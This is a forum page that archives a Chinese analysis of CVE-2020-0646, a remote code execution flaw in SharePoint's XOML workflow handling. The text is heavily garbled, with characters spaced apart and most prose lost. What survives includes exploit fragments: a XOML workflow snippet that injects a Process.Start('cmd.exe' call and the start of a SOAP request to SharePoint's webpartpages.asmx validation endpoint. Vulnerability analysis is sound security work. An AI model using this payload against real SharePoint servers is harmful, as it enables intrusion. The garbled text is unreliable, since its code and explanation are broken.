搜索

[15077] 2020-03-01_CVE-2020-0646:SharePoint中的远程代码执行漏洞分析

文档创建者:s7ckTeam
浏览次数:0
最后更新:2025-01-18
2020-03-01_CVE-2020-0646:SharePoint中的远程代码执行漏洞分析 C V E - 2 0 2 0 - 0 6 4 6 S h a r e P o i n t A l p h a _ h 4 c k   F r e e B u f   2 0 2 0 - 0 3 - 0 1 2 0 1 9 1 1 S h a r e P o i n t   O n l i n e 线 线 2 0 2 0 1 . N E T   F r a m e w o r k S h a r e P o i n t   O n - R r e m i s e 2 0 2 0 1 . N E T I I S . X O M L C V E - 2 0 2 0 - 0 6 4 6 X O M L S y s t e m . W o r k f l o w . A c t i v i t i e s S h a r e P o i n t W o r k f l o w n o c o d e X O M L 使 C a l l E x t e r n a l M e t h o d A c t i v i t y I n t e r f a c e T y p e C # I n t e r f a c e T y p e S t r i n g M e t h o d N a m e C o d e A c t i v i t y E x e c u t e C o d e S h a r e P o i n t 线 O n - P r e m i s e A c t i v i t y 使 H T T P S h a r e P o i n t   O n l i n e D N S O n - P r e m i s e C V E - 2 0 2 0 - 0 6 4 6 S h a r e P o i n t X M L 使 n o c o d e C # 1 h t t p s : / / w w w . n c c g r o u p . t r u s t / u k / o u r - r e s e a r c h / t e c h n i c a l - a d v i s o r y - b y p a s s i n g - w o r k f l o w s - p r o t e c t i o n - m e c h a n i s m s - r e m o t e - c o d e - e x e c u t i o n - o n - s h a r e p o i n t / 2 h t t p s : / / w w w . n c c g r o u p . t r u s t / u k / o u r - r e s e a r c h / t e c h n i c a l - a d v i s o r y - b y p a s s i n g - m i c r o s o f t - x o m l - w o r k f l o w s - p r o t e c t i o n - m e c h a n i s m s - u s i n g - d e s e r i a l i s a t i o n - o f - u n t r u s t e d - d a t a / *   m d s e c F B A l p h a _ h 4 c k F r e e B u f . C O M < S e q u e n t i a l W o r k f l o w A c t i v i t y   x : C l a s s = " M y W o r k f l o w "   x : N a m e = " f o o b a r "   x m l n s : x = " h t t p : / / s c h e m a s . m i c r o s o f t . c o m / w i n f x / 2 0 0 6 / x a m l "   x m l n s = " h t t p : / / s c h e m a s . m i c r o s o f t . c o m / w i n f x / 2 0 0 6 / x a m l / w o r k f l o w "         p r i v a t e   v o i d   I n i t i a l i z e C o m p o n e n t ( )         {                                 t h i s . c o d e A c t i v i t y 1 . I n t e r f a c e T y p e   =   t y p e o f ( S y s t e m . S t r i n g ) ; } O b j e c t / * * / t e s t 2 = S y s t e m . D i a g n o s t i c s . P r o c e s s . S t a r t ( " c m d . e x e " P O S T   h t t p : / / [ R E D A C T E D ] . s h a r e p o i n t . c o m / _ v t i _ b i n / w e b p a r t p a g e s . a s m x   H T T P / 1 . 1 D a t e :   T u e ,   2 9   O c t   2 0 1 9   1 4 : 2 6 : 2 1   G M T M I M E - V e r s i o n :   1 . 0 A c c e p t :   * / * S O A P A c t i o n :   h t t p : / / m i c r o s o f t . c o m / s h a r e p o i n t / w e b p a r t p a g e s / V a l i d a t e W o r k f l o w M a r k u p A n d C r e a t e S u p p o r t O b j e c t s U s e r - A g e n t :   M o z i l l a / 4 . 0   ( c o m p a t i b l e ;   M S   F r o n t P a g e   1 5 . 0 ) H o s t :   [ R E D A C T E D ] . s h a r e p o i n t . c o m A c c e p t - L a n g u a g e :   e n - u s ,   e n ; q = 0 . 1 A c c e p t :   a u t h / s i c i l y X - F O R M S _ B A S E D _ A U T H _ A C C E P T E D :   T C o n t e n t - T y p e :   t e x t / x m l ;   c h a r s e t = u t f - 8 X - V e r m e e r - C o n t e n t - T y p e :   t e x t / x m l ;   c h a r s e t = u t f - 8 A c c e p t - e n c o d i n g :   g z i p ,   d e f l a t e C o n n e c t i o n :   K e e p - A l i v e P r a g m a :   n o - c a c h e C o n t e n t - L e n g t h :   1 0 3 1 C o o k i e :   [ R E D A C T E D ]

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理